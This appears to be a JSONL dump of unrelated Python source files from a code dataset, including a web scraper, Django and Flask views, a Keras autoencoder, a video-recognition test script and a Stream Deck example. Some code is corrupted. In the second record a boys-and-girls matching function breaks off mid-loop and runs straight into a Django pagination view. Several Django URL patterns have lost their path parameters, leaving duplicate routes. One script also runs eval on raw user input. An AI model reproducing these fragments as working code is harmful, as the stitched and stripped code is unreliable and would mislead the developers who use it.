+{"seq_id":"387736403","text":"import requests\nfrom bs4 import BeautifulSoup\nimport json\n\ndef scrapeEvent(url):\n print(\"request url is: \" +url +\"\\n\")\n page = requests.get(url)\n soup = BeautifulSoup(page.text, 'html.parser')\n\n\n mydivs = soup.find(\"div\", {\"class\": \"event-list\"})\n players = mydivs.find_all(\"li\", recursive=False)\n\n list_of_players = []\n for player in players:\n playerDict = {\n #\"placing\" = 0,\n ##\"name\" = \"0\",\n #\"itcPoints\" = None,\n #\"faction\" = None,\n #\"swissPoints\" = None,\n #\"record\" = []\n }\n player_result = player.find(\"time\")\n playerDict[\"placing\"] = int(player_result.find(\"span\", {\"class\": \"placing\"}).get_text())\n try:\n playerDict[\"itcPoints\"] = float(player_result.find(\"span\", {\"class\": \"itcpts\"}).get_text())\n except:\n # print(player.prettify())\n # print(playerDict)\n playerDict[\"itcPoints\"] = 0.0\n playerInfo= player.find(\"div\", {\"class\": \"info\"})\n #print(\"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\")\n try:\n playerDict[\"name\"] = playerInfo.find(\"h2\").find(\"span\").get_text()\n except:\n playerDict[\"name\"] = playerInfo.find(\"h2\").get_text()\n #print(playerInfo.prettify())\n \n playerDict[\"faction\"] = playerInfo.find(\"p\").get_text().split(\"-\")[0]\n playerDict[\"team\"] = playerInfo.find(\"p\").get_text().split(\"-\")[1]\n playerScores = player.find(\"div\", {\"class\": \"scoresLabel\"}).find(\"ul\").find_all(\"li\", recursive=False)\n playerDict[\"swissPoints\"] = playerScores[0].get_text()\n playerDict[\"wins\"] = []\n playerDict[\"losses\"] = []\n playerDict[\"draws\"] = []\n wins = playerScores[1].find_all(\"span\", {\"style\": \"color:green;\"})\n losses = playerScores[1].find_all(\"span\", {\"style\": \"color:red;\"})\n draws = playerScores[1].find_all(\"span\", {\"style\": \"color:yellow;\"})\n for win in wins:\n playerDict[\"wins\"].append(int(win.get_text()))\n for loss in losses:\n playerDict[\"losses\"].append(int(loss.get_text()))\n for draw in draws:\n playerDict[\"draws\"].append(int(draw.get_text()))\n list_of_players.append(playerDict)\n if len(list_of_players) == 0:\n return False\n if len(list_of_players[0][\"wins\"]) == 0 and len(list_of_players[0][\"losses\"]) == 0:\n return False\n return list_of_players\n\nif __name__ == \"__main__\":\n listOfPlayers = scrapeEvent(\"https://www.bestcoastpairings.com/r/1ved4krt\")\n with open(\"workfile.json\", 'w') as f:\n f.write(json.dumps(listOfPlayers, indent=4))\n","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"496523657","text":"def Test():\n n=int(input())\n boys=eval(\"[\"+input().strip().replace(\" \",\",\")+\"]\")\n m=int(input())\n girls=eval(\"[\"+input().strip().replace(\" \",\",\")+\"]\")\n z=min(m,n)\n boys.sort()\n girls.sort()\n parts=[]\n j=0\n if(z==n):\n while(j 100:\n limit = 10\n paginator = Paginator(qs, limit)\n paginator.baseurl = baseurl\n try:\n page = paginator.page(page)\n except EmptyPage:\n page = paginator.page(paginator.num_pages)\n return page, paginator\n\ndef new(request):\n question = Question.objects.new()\n page, paginator = pagination(question, request, '/?page=')\n context = {'questions': page.object_list, 'paginator': paginator, 'page': page, }\n return render(request, 'list.html', context)\n\ndef popular(request):\n question = Question.objects.popular()\n page, paginator = pagination(question, request, '/popular/?page=')\n context = {'questions': page.object_list, 'paginator': paginator, 'page': page, }\n return render(request, 'popular.html', context)\n\ndef question(request, index):\n quest = get_object_or_404(Question, pk=index)\n if request.method == \"POST\":\n form = AnswerForm(request.POST)\n if form.is_valid():\n form.save(quest.pk)\n url = quest.get_absolute_url()\n return HttpResponseRedirect(url)\n else:\n form = AnswerForm()\n answers = Answer.objects.filter(question = quest)\n context = {'question': quest, 'answers': answers, 'form' : form }\n return render(request, 'question.html', context)\n\ndef ask(request):\n if request.method == \"POST\":\n form = AskForm(request.POST)\n if form.is_valid():\n question = form.save()\n url = question.get_absolute_url()\n return HttpResponseRedirect(url)\n else:\n form = AskForm()\n context = {'form' : form }\n return render(request, 'ask.html', context)\n\ndef test(request, *args, **kwargs):\n return HttpResponse('OK')\n","sub_path":"ask/qa/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"170585019","text":"\"\"\" Denoising Auto-Encoder \"\"\"\n\nfrom keras.models import Sequential\nfrom keras.layers.convolutional import Conv1D\nfrom keras.layers import Dense, Activation, Reshape, Flatten\n\n\nMODEL_CONV_FILTERS = 8\nMODEL_CONV_KERNEL_SIZE = 4\nMODEL_CONV_STRIDES = 1\nMODEL_CONV_PADDING = 'same'\n\n\ndef build_model(input_shape):\n seq_length = input_shape[0]\n\n # build it!\n model = Sequential()\n\n # conv\n model.add(Conv1D(input_shape=input_shape,\n filters=MODEL_CONV_FILTERS,\n kernel_size=MODEL_CONV_KERNEL_SIZE,\n strides=MODEL_CONV_STRIDES,\n padding=MODEL_CONV_PADDING))\n model.add(Activation('linear'))\n\n # reshape\n model.add(Flatten())\n\n # dense\n model.add(Dense(units=seq_length*MODEL_CONV_FILTERS))\n model.add(Activation('relu'))\n\n # dense\n model.add(Dense(units=128))\n model.add(Activation('relu'))\n\n # dense\n model.add(Dense(units=seq_length*MODEL_CONV_FILTERS))\n model.add(Activation('relu'))\n\n # reshape\n model.add(Reshape(target_shape=(seq_length, MODEL_CONV_FILTERS)))\n\n # conv\n model.add(Conv1D(filters=1,\n kernel_size=MODEL_CONV_KERNEL_SIZE,\n strides=MODEL_CONV_STRIDES,\n padding=MODEL_CONV_PADDING))\n model.add(Activation('linear'))\n\n # compile it!\n model.compile(loss='mean_squared_error',\n optimizer='adam',\n metrics=['mse', 'mae', 'acc'])\n\n return model","sub_path":"topologies/dae.py","file_name":"dae.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"528989351","text":"# Code for \"TDN: Temporal Difference Networks for Efficient Action Recognition\"\n# arXiv: 2012.10071\n# Limin Wang, Zhan Tong, Bin Ji, Gangshan Wu\n# tongzhan@smail.nju.edu.cn\n\nimport os\nimport argparse\nimport time\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport torch.nn.parallel\nimport torch.optim\nfrom sklearn.metrics import confusion_matrix\nfrom ops.dataset import TSNDataSet\nfrom ops.models import TSN\nfrom ops.transforms import *\nfrom ops import dataset_config\nfrom torch.nn import functional as F\nimport pickle\n\n# options\nparser = argparse.ArgumentParser(description=\"TDN testing on the full validation set\")\nparser.add_argument('dataset', type=str)\n\n# may contain splits\nparser.add_argument('--weights', type=str, default=None)\nparser.add_argument('--test_segments', type=str, default=25)\nparser.add_argument('--modalities', type=str, default='RGB')\nparser.add_argument('--archs', type=str, default='resnet50')\nparser.add_argument('--dense_sample', default=False, action=\"store_true\", help='use dense sample as I3D')\nparser.add_argument('--full_res', default=False, action=\"store_true\",\n help='use full resolution 256x256 for test as in Non-local I3D')\n\nparser.add_argument('--test_crops', type=int, default=1)\nparser.add_argument('--coeff', type=str, default=None)\nparser.add_argument('--batch_size', type=int, default=1)\nparser.add_argument('-j', '--workers', default=8, type=int, metavar='N',\n help='number of data loading workers (default: 8)')\n\n# for true test\nparser.add_argument('--topk', type=int, default=5)\nparser.add_argument('--test_list', type=str, default=None)\nparser.add_argument('--csv_file', type=str, default=None)\nparser.add_argument('--softmax', default=False, action=\"store_true\", help='use softmax')\n\nparser.add_argument('--max_num', type=int, default=-1)\nparser.add_argument('--input_size', type=int, default=224)\nparser.add_argument('--crop_fusion_type', type=str, default='avg')\nparser.add_argument('--gpus', nargs='+', type=int, default=None)\nparser.add_argument('--img_feature_dim',type=int, default=256)\nparser.add_argument('--num_set_segments',type=int, default=1,help='TODO: select multiply set of n-frames from a video')\nparser.add_argument('--pretrain', type=str, default='imagenet')\nparser.add_argument('--output_dir',type=str,default=\"./result_file_0605_center16_ssv2\",help='directory for pkl')\nparser.add_argument('--clip_index', type=int, default=0)\n\nargs = parser.parse_args()\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\n\ndef accuracy(output, target, topk=(1,)):\n \"\"\"Computes the precision@k for the specified values of k\"\"\"\n maxk = max(topk)\n batch_size = target.size(0)\n _, pred = output.topk(maxk, 1, True, True)\n pred = pred.t()\n correct = pred.eq(target.view(1, -1).expand_as(pred))\n res = []\n for k in topk:\n correct_k = correct[:k].view(-1).float().sum(0)\n res.append(correct_k.mul_(100.0 / batch_size))\n return res\n\n\nweights_list = args.weights.split(',')\ntest_segments_list = [int(s) for s in args.test_segments.split(',')]\nassert len(weights_list) == len(test_segments_list)\nif args.coeff is None:\n coeff_list = [1] * len(weights_list)\nelse:\n coeff_list = [float(c) 
for c in args.coeff.split(',')]\n\nif args.test_list is not None:\n test_file_list = args.test_list.split(',')\nelse:\n test_file_list = [None] * len(weights_list)\n\n\ndata_iter_list = []\nnet_list = []\nmodality_list = args.modalities.split(',')\narch_list = args.archs.split('.')\n\ntotal_num = None\nfor this_weights, this_test_segments, test_file, modality, this_arch in zip(weights_list, test_segments_list, test_file_list, modality_list, arch_list):\n num_class, args.train_list, val_list, root_path, prefix = dataset_config.return_dataset(args.dataset,\n modality)\n net = TSN(num_class, this_test_segments, modality,\n base_model=this_arch,\n consensus_type=args.crop_fusion_type,\n img_feature_dim=args.img_feature_dim,\n pretrain=args.pretrain\n )\n checkpoint = torch.load(this_weights)\n try:\n net.load_state_dict(checkpoint['state_dict'])\n except:\n checkpoint = checkpoint['state_dict']\n\n base_dict = {'.'.join(k.split('.')[1:]): v for k, v in list(checkpoint.items())}\n replace_dict = {'base_model.classifier.weight': 'new_fc.weight',\n 'base_model.classifier.bias': 'new_fc.bias',\n }\n for k, v in replace_dict.items():\n if k in base_dict:\n base_dict[v] = base_dict.pop(k)\n\n net.load_state_dict(base_dict)\n\n input_size = net.scale_size if args.full_res else net.input_size\n if args.test_crops == 1:\n cropping = torchvision.transforms.Compose([\n GroupScale(net.scale_size),\n GroupCenterCrop(input_size),\n ])\n elif args.test_crops == 3: \n cropping = torchvision.transforms.Compose([\n GroupFullResSample(input_size, net.scale_size, flip=False)\n ])\n elif args.test_crops == 5: # do not flip, so only 5 crops\n cropping = torchvision.transforms.Compose([\n GroupOverSample(input_size, net.scale_size, flip=False)\n ])\n elif args.test_crops == 10:\n cropping = torchvision.transforms.Compose([\n GroupOverSample(input_size, net.scale_size)\n ])\n else:\n raise ValueError(\"Only 1, 5, 10 crops are supported while we got {}\".format(args.test_crops))\n\n data_loader = torch.utils.data.DataLoader(\n TSNDataSet(args.dataset, root_path, test_file if test_file is not None else val_list, num_segments=this_test_segments,\n new_length=5 if modality == \"RGB\" else 5,\n modality=modality,\n image_tmpl=prefix,\n clip_index=args.clip_index,\n test_mode=True,\n remove_missing=len(weights_list) == 1,\n transform=torchvision.transforms.Compose([\n cropping,\n Stack(roll=(this_arch in ['BNInception', 'InceptionV3'])),\n ToTorchFormatTensor(div=(this_arch not in ['BNInception', 'InceptionV3'])),\n GroupNormalize(net.input_mean, net.input_std),\n ]), dense_sample=args.dense_sample, ),\n batch_size=args.batch_size, shuffle=False,\n num_workers=args.workers, pin_memory=True,\n )\n\n if args.gpus is not None:\n devices = [args.gpus[i%len(args.gpus)] for i in range(args.workers)]\n else:\n devices = list(range(args.workers))\n\n net = torch.nn.DataParallel(net.cuda())\n net.eval()\n\n data_gen = enumerate(data_loader)\n\n if total_num is None:\n total_num = len(data_loader.dataset)\n else:\n assert total_num == len(data_loader.dataset)\n\n data_iter_list.append(data_gen)\n net_list.append(net)\n\n\noutput0 = []\noutput1 = []\noutput2 = []\n\ndef eval_video(video_data, net, this_test_segments, modality):\n net.eval()\n with torch.no_grad():\n i, data, label = video_data\n batch_size = label.numel()\n num_crop = args.test_crops\n if args.dense_sample:\n num_crop *= 10 # 10 clips for testing when using dense sample\n\n if modality == 'RGB':\n length = 3\n elif modality == 'Flow':\n length = 10\n elif modality == 
'RGBDiff':\n length = 18\n else:\n raise ValueError(\"Unknown modality \"+ modality)\n\n start_time = time.time()\n data_in = data.view(-1, length*5, data.size(2), data.size(3))\n data_in = data_in.view(batch_size , num_crop, this_test_segments, length*5, data_in.size(2), data_in.size(3))\n data_in0 = data_in[:,0,:,:,:,:]\n data_in1 = data_in[:,1,:,:,:,:]\n data_in2 = data_in[:,2,:,:,:,:]\n data_in0 = data_in0.view(batch_size , 1, this_test_segments, length*5, data.size(2), data.size(3))\n data_in1 = data_in1.view(batch_size , 1, this_test_segments, length*5, data.size(2), data.size(3))\n data_in2 = data_in2.view(batch_size , 1, this_test_segments, length*5, data.size(2), data.size(3))\n rst0 = net(data_in0)\n rst0 = rst0.reshape(batch_size, 1, -1)\n rst1 = net(data_in1)\n rst1 = rst1.reshape(batch_size, 1, -1)\n rst2 = net(data_in2)\n rst2 = rst2.reshape(batch_size, 1, -1)\n \n\n if args.softmax:\n # take the softmax to normalize the output to probability\n rst0 = F.softmax(rst0, dim=1)\n rst1 = F.softmax(rst1, dim=1)\n rst2 = F.softmax(rst2, dim=1)\n\n inference_time = time.time() - start_time\n rst0 = rst0.data.cpu().numpy().copy()\n rst1 = rst1.data.cpu().numpy().copy()\n rst2 = rst2.data.cpu().numpy().copy()\n\n rst0 = rst0.reshape((batch_size, -1, num_class)).mean(axis=1).reshape((batch_size, num_class))\n rst1 = rst1.reshape((batch_size, -1, num_class)).mean(axis=1).reshape((batch_size, num_class))\n rst2 = rst2.reshape((batch_size, -1, num_class)).mean(axis=1).reshape((batch_size, num_class))\n\n return i, rst0,rst1,rst2, label, inference_time\n\n\nproc_start_time = time.time()\nmax_num = args.max_num if args.max_num > 0 else total_num\n\ntop01 = AverageMeter()\ntop05 = AverageMeter()\n\ntop11 = AverageMeter()\ntop15 = AverageMeter()\n\ntop21 = AverageMeter()\ntop25 = AverageMeter()\n\ntotal_inference_time = 0.0\n\nfor i, data_label_pairs in enumerate(zip(*data_iter_list)):\n with torch.no_grad():\n if i >= max_num:\n break\n this_rst0_list = []\n this_rst1_list = []\n this_rst2_list = []\n this_label = None\n for n_seg, (_, (data, label)), net, modality in zip(test_segments_list, data_label_pairs, net_list, modality_list):\n rst = eval_video((i, data, label), net, n_seg, modality)\n total_inference_time += rst[5]\n\n this_rst0_list.append(rst[1])\n this_rst1_list.append(rst[2])\n this_rst2_list.append(rst[3])\n this_label = label\n assert len(this_rst0_list) == len(coeff_list)\n for i_coeff in range(len(this_rst0_list)):\n this_rst0_list[i_coeff] *= coeff_list[i_coeff]\n this_rst1_list[i_coeff] *= coeff_list[i_coeff]\n this_rst2_list[i_coeff] *= coeff_list[i_coeff]\n\n ensembled_predict0 = sum(this_rst0_list) / len(this_rst0_list)\n ensembled_predict1 = sum(this_rst1_list) / len(this_rst1_list)\n ensembled_predict2 = sum(this_rst2_list) / len(this_rst2_list)\n\n for p, g in zip(ensembled_predict0, this_label.cpu().numpy()):\n output0.append([p[None, ...], g])\n for p, g in zip(ensembled_predict1, this_label.cpu().numpy()):\n output1.append([p[None, ...], g])\n for p, g in zip(ensembled_predict2, this_label.cpu().numpy()):\n output2.append([p[None, ...], g])\n cnt_time = time.time() - proc_start_time\n prec01, prec05 = accuracy(torch.from_numpy(ensembled_predict0), this_label, topk=(1, args.topk))\n prec11, prec15 = accuracy(torch.from_numpy(ensembled_predict1), this_label, topk=(1, args.topk))\n prec21, prec25 = accuracy(torch.from_numpy(ensembled_predict2), this_label, topk=(1, args.topk))\n top01.update(prec01.item(), this_label.numel())\n top05.update(prec05.item(), 
this_label.numel())\n top11.update(prec11.item(), this_label.numel())\n top15.update(prec15.item(), this_label.numel())\n top21.update(prec21.item(), this_label.numel())\n top25.update(prec25.item(), this_label.numel())\n if i % 1 == 0:\n print('video {} done, total {}/{}, average {:.3f} sec/video, '\n 'moving Prec@1 {:.3f} Prec@5 {:.3f}'.format(i * args.batch_size, i * args.batch_size, total_num,\n float(cnt_time) / (i+1) / args.batch_size, top11.avg, top15.avg))\n\nvideo_pred0 = [np.argmax(x[0]) for x in output0]\nvideo_pred1 = [np.argmax(x[0]) for x in output1]\nvideo_pred2 = [np.argmax(x[0]) for x in output2]\nvideo_pred0_top5 = [np.argsort(np.mean(x[0], axis=0).reshape(-1))[::-1][:5] for x in output0]\nvideo_pred1_top5 = [np.argsort(np.mean(x[0], axis=0).reshape(-1))[::-1][:5] for x in output1]\nvideo_pred2_top5 = [np.argsort(np.mean(x[0], axis=0).reshape(-1))[::-1][:5] for x in output2]\n\nvideo_labels = [x[1] for x in output0]\n\noutput_dir = args.output_dir\nif not os.path.exists(output_dir):\n os.makedirs(output_dir)\n print(\"Store results matrix into {}\".format(output_dir))\noutput0_filepath = os.path.join(output_dir, str(args.clip_index)+'_'+'crop0'+'.pkl')\noutput1_filepath = os.path.join(output_dir, str(args.clip_index)+'_'+'crop1'+'.pkl')\noutput2_filepath = os.path.join(output_dir, str(args.clip_index)+'_'+'crop2'+'.pkl')\nwith open(output0_filepath, 'wb') as f:\n pickle.dump(output0, f, pickle.HIGHEST_PROTOCOL)\nwith open(output1_filepath, 'wb') as f:\n pickle.dump(output1, f, pickle.HIGHEST_PROTOCOL)\nwith open(output2_filepath, 'wb') as f:\n pickle.dump(output2, f, pickle.HIGHEST_PROTOCOL)\n\n","sub_path":"test_models_three_crops.py","file_name":"test_models_three_crops.py","file_ext":"py","file_size_in_byte":13639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
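Each run of the script writes one pickle per crop, where every entry is `[scores[None, ...], label]`. A sketch of how the three crop files can be merged back into a single top-1 accuracy; the file names follow the `{clip_index}_crop{n}.pkl` pattern used above, and the directory is a placeholder:

```python
import pickle
import numpy as np

def load_entries(path):
    with open(path, 'rb') as f:
        return pickle.load(f)

crops = [load_entries('result_file/0_crop{}.pkl'.format(n)) for n in range(3)]
labels = np.array([entry[1] for entry in crops[0]])
# stack the (1, num_class) score rows per crop, then average across crops
scores = sum(np.concatenate([entry[0] for entry in crop]) for crop in crops) / len(crops)
print('three-crop top-1: {:.3f}'.format((scores.argmax(axis=1) == labels).mean()))
```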
+{"seq_id":"422451637","text":"from django.urls import path\nfrom students.views import FileFieldView, StudentDetailView, StudentsListView, StudentLogListView, ExaminationListView, \\\n ExaminationDetailView, AttendanceDetailView, HostelListView, HostelDetailView, HostelAttendanceDetailView, \\\n HostelStudentDetailView, VisitorDetailView, StudentVisitorDetailView, StudentPropertyDetailView, approve_attendance, \\\n approve_hostel_attendance, HostelPorterAttendanceDetailView, ExaminationSupervisorDetailView, \\\n ManagementReportListView\nfrom .views import HomePageView, upload_student_records\n\n\n\n\nurlpatterns = [\n path('', HomePageView.as_view(), name='home'),\n path('dataupload/', FileFieldView.as_view(), name='dataupload'),\n path('student/', StudentDetailView.as_view(), name='student_details'),\n path('attendance/', AttendanceDetailView.as_view(), name='attendance_details'),\n path('student/visitor', VisitorDetailView.as_view(), name='visitor_details'),\n path('student/property', StudentPropertyDetailView.as_view(), name='student_property_details'),\n path('student/studentvisitor', StudentVisitorDetailView.as_view(), name='student_visitor_attendance'),\n path('hostel/attendance/', HostelAttendanceDetailView.as_view(), name='hostel_attendance_details'),\n path('hostel/porter/attendance/', HostelPorterAttendanceDetailView.as_view(), name='hostel_porter_attendance'),\n path('examination//', ExaminationDetailView.as_view(), name='examination_details'),\n path('examination//report/', ExaminationSupervisorDetailView.as_view(), name='supervisor_report'),\n path('hostel/student//', HostelStudentDetailView.as_view(), name='hostel_student_details'),\n path('hostel//', HostelDetailView.as_view(), name='hostel_details'),\n path('students/', StudentsListView.as_view(), name='student_list'),\n path('management/report', ManagementReportListView.as_view(), name='management_report'),\n path('examinations/', ExaminationListView.as_view(), name='examination_list'),\n path('examinations/approve', approve_attendance, name='approve_attendance'),\n path('hostel/approve', approve_hostel_attendance, name='approve_hostel_attendance'),\n path('hostels/', HostelListView.as_view(), name='hostel_list'),\n path('studentslog/', StudentLogListView.as_view(), name='student_log'),\n]\n","sub_path":"pages/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"262147706","text":"#!/usr/bin/env python\n\n# Python Strem Deck Library\n# Released under the MIT license\n#\n# dean [at] fourwalledcubicle [dot] com\n# www.fourwalledcubicle.com\n#\n\nfrom StreamDeck.StreamDeck import DeviceManager\n\n\ndef get_random_key_colour_image(deck):\n import random\n\n key_image_format = deck.key_image_format()\n\n key_image_byte_count = key_image_format['width'] * \\\n key_image_format['height'] * key_image_format['depth']\n\n key_image_buffer = bytearray(key_image_byte_count)\n\n rand_colour_bgr = [int(random.random() * 255) for i in range(0, 3)]\n for i in range(0, len(key_image_buffer)):\n key_image_buffer[i] = rand_colour_bgr[i % 3]\n\n return key_image_buffer\n\n\ndef key_change_callback(deck, key, state):\n print(\"Deck {} Key {} = {}\".format(deck.id(), key, state), flush=True)\n\n if state:\n deck.set_key_image(key, get_random_key_colour_image(deck))\n\n\nmanager = DeviceManager()\ndecks = manager.enumerate()\n\nprint(\"Found {} Stream Decks.\".format(len(decks)))\n\nfor d in decks:\n d.open()\n\n d.set_brightness(30)\n\n for k in range(0, d.key_count()):\n d.set_key_image(k, get_random_key_colour_image(d))\n\n current_key_states = d.key_states()\n print(\"Initial key states: {}\".format(current_key_states))\n\n d.set_key_callback(key_change_callback)\n","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"406665715","text":"# -*- coding: utf-8 -*-\nimport json\n\nfrom flask import request, Response\n\nfrom ..utils import proccess_path\n\n\ndef post(api, path, mongo_client):\n params = request.json or request.form.to_dict()\n resource_id, collection, data = proccess_path(path=path, params=params)\n if resource_id is None:\n resource_id = mongo_client[api][collection].insert(data)\n if resource_id is not None:\n data['id'] = str(data.pop('_id'))\n return Response(\n response=json.dumps(data),\n headers={\n 'Location': '/%s/%s/%s' % (api, collection, data['id']),\n },\n status=201\n )\n else:\n return Response(\n response=json.dumps({\n 'message': u'Not supported resource creation'\n }),\n status=405\n )\n","sub_path":"auto_api/controllers/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"40121951","text":"from rest_framework import viewsets\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import action\nfrom django.contrib.auth.models import User, Group\nfrom api.models import Post, PostLike, PostDislike, ActivityProfile\nfrom api.serializers import UserSerializer, PostSerializer, PostLikeSerializer\nfrom rest_framework.views import APIView\nimport datetime\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n\n\tqueryset = User.objects.all().order_by('-date_joined')\n\tserializer_class = UserSerializer\n\n\t@action(detail=True, methods=['get'])\n\tdef activity(self, request, pk, format=None):\n\n\t\tlast_login = User.objects.get(pk=pk).last_login\n\t\tlast_activity = ActivityProfile.objects.get(\n\t\t\tperson=User.objects.get(pk=pk)).last_activity\n\t\tcontent = {\n\t\t\t'last_login': last_login, \n\t\t\t'last_activity': last_activity,\n\t\t}\n\n\t\treturn Response(content)\n\t\t\n\nclass PostViewSet(viewsets.ModelViewSet):\n\n\tqueryset = Post.objects.all()\n\tserializer_class = PostSerializer\n\n\t@action(detail=True, methods=['post', 'get'])\n\tdef like(self, request, *args, **kwargs):\n\n\t\tpost = self.get_object()\n\t\tif not any(post.likes.filter(person=request.user).all()):\n\t\t\tlike = PostLike(tweet=post, person=request.user)\n\t\t\tlike.save()\n\t\t\tif any(post.dislikes.filter(person=request.user).all()):\n\t\t\t\tpost.dislikes.filter(person=request.user).delete()\n\t\t\tcontent = {'message':'post has been liked'}\n\t\t\treturn Response(content)\n\t\telse:\n\t\t\tcontent = {'message':'post had been already liked'}\n\t\t\treturn Response(content)\n\n\t@action(detail=True, methods=['post', 'get'])\n\tdef dislike(self, request, *args, **kwargs):\n\n\t\tpost = self.get_object()\n\t\tif not any(post.dislikes.filter(person=request.user).all()):\n\t\t\tdislike = PostDislike(tweet=post, person=request.user)\n\t\t\tdislike.save()\n\t\t\tif any(post.likes.filter(person=request.user).all()):\n\t\t\t\tpost.likes.filter(person=request.user).delete()\n\t\t\tcontent = {'message':'post has been disliked'}\n\t\t\treturn Response(content)\n\t\telse:\n\t\t\tcontent = {'message':'post had been already liked'}\n\t\t\treturn Response(content)\n\n\nclass AnaliticsView(APIView):\n\t\n\tdef get(self, request, format=None):\n\t\ttry:\n\t\t\tdate_from = datetime.datetime.strptime(request.query_params['date_from'], \"%Y-%m-%d\").date()\n\t\t\tdate_to = datetime.datetime.strptime(request.query_params['date_to'], \"%Y-%m-%d\").date()\n\t\t\tif date_from > date_to: \n\t\t\t\tcontent = {'message':'from_date is older than to_date. try again.'}\n\t\texcept Exception as e:\n\t\t\tcontent = {'message':'error invalid date. try again.'}\n\t\t\treturn Response(content)\n\n\t\tlikes = request.user.person_like.filter(date__range=(date_from, date_to)).count()\n\t\tdislikes = request.user.person_dislike.filter(date__range=(date_from, date_to)).count()\n\t\tcontent = {'Analitics of like/dislke amount from your account from {} to {}'.format(\n\t\t\t\t\t\tdate_from, date_to\n\t\t\t\t\t): {'likes': likes, 'dislikes': dislikes}\n\t\t\t\t }\n\t\treturn Response(content)\t\n","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"622298599","text":"#!/bin/env python\n# -*-coding:utf-8-*-\n\nimport json\n\nfrom common.base_view import BaseView\nfrom common import utility\nfrom common import error_msg\nfrom conf import settings\n\nfrom profile.controllers import student_obj\nfrom profile.controllers import notification_obj\n\n\nclass Resume(BaseView):\n def get(self):\n self.set_input_argument(\"school_id\", self._user.school_id)\n self._do_get(transform_json=False)\n if self._ret != 0:\n return self.response()\n data = self._data[\"list\"]\n if not isinstance(data, list):\n if data:\n data = [data]\n else:\n data = []\n self._controller_obj.conf_match(\n input=data,\n key=(\n \"type\",\n \"flag\"\n ),\n new_key=(\n \"type_name\",\n \"flag_name\"\n )\n )\n if not self._input.get(\"student_id\", None):\n student_obj.id_match(\n session=self._db_session,\n input=data,\n match_key=\"student_id\",\n attribute_list=[\n (\"name\", \"student_name\"),\n [\"student_number\"],\n [\"academy_id\"],\n [\"major_id\"],\n [\"grade_id\"],\n [\"class_id\"],\n ])\n for i in data:\n i.img_json_path = [\n \"%s%s\" % (settings.SERVER_HOST, j)\n for j in json.loads(i.img_json)\n ]\n data = utility.to_obj(data)\n self._data[\"list\"] = data\n return self.response()\n\n def post(self):\n if not self.check_input_arguments(must_input=[\"img_json\"]):\n return self.response(error_msg.PARAMS_ERROR)\n self.set_input_argument(\"school_id\", self._user.school_id)\n self.set_input_argument(\"student_id\", self._user.id)\n self.set_input_argument(\n \"img_json\",\n json.dumps(self._input[\"img_json\"]))\n return super(Resume, self).post()\n\n def put(self):\n if not self.check_input_arguments(must_input=[\"id\", \"type\"]):\n return self.response(error_msg.PARAMS_ERROR)\n resume, number = self._controller_obj.filter_item(\n session=self._db_session,\n id=self._input[\"id\"])\n if number != 1:\n return self.response(error_msg.PARAMS_ERROR)\n resume.type = self._input[\"type\"]\n type_list = self._controller_obj.get_conf_list(\"type\")\n type_name = \"\"\n for i in type_list:\n if i[0] == int(self._input[\"type\"]):\n type_name = i[1]\n break\n notification_obj.new_item(\n session=self._db_session,\n school_id=resume.school_id,\n student_id=resume.student_id,\n title=u\"%s ,审核结果: %s\" % (resume.title, type_name),\n content=u\"%s ,审核结果: %s, 具体请到个人经历查看\" % (resume.title, type_name),\n writer=u\"管理员\",\n )\n self._db_session.commit()\n return self.response()\n","sub_path":"profile/views/resume_view.py","file_name":"resume_view.py","file_ext":"py","file_size_in_byte":3257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"303228499","text":"# -*- coding: utf-8 -*-\n# pylint: disable-msg=w0201\n'''generic element models'''\n\nfrom graphalchemy.core import octopus\nfrom graphalchemy.mixins.elements import LinkMixin, NodeMixin, ElementMixin\n\n__all__ = ('Link', 'Node')\n\nconf = octopus.S\ndirect = getattr(octopus, 'direct')\ndefer = getattr(octopus, 'defer')\n\n\nclass Generic(ElementMixin, octopus.slave):\n\n '''generic graph model'''\n\n # generic links collection\n _links = direct(conf.generic.collector.link, conf.generics)\n\n @staticmethod\n def _link():\n '''link class'''\n return Link\n\n\nclass Link(LinkMixin, Generic):\n\n '''generic link model'''\n\n @staticmethod\n def _node():\n '''node class'''\n return Node\n\n @defer\n def create(self, kw):\n '''make link'''\n self.source = self.l.make(self.link, self.start, self.end, kw=kw)\n self._refresh()\n\n @defer\n def modify(self, **kw):\n '''update link'''\n self.l.modify(self, kw)\n self._refresh()\n\n\nclass Node(NodeMixin, Generic):\n\n '''generic node model'''\n\n # generic node collection\n _nodes = direct(conf.generic.collector.node, conf.generics)\n\n @defer\n def create(self, kw):\n '''make node'''\n self.source = self.n.make(kw)\n self._refresh()\n\n @defer\n def modify(self, kw):\n '''update node'''\n self.n.modify(self, kw)\n 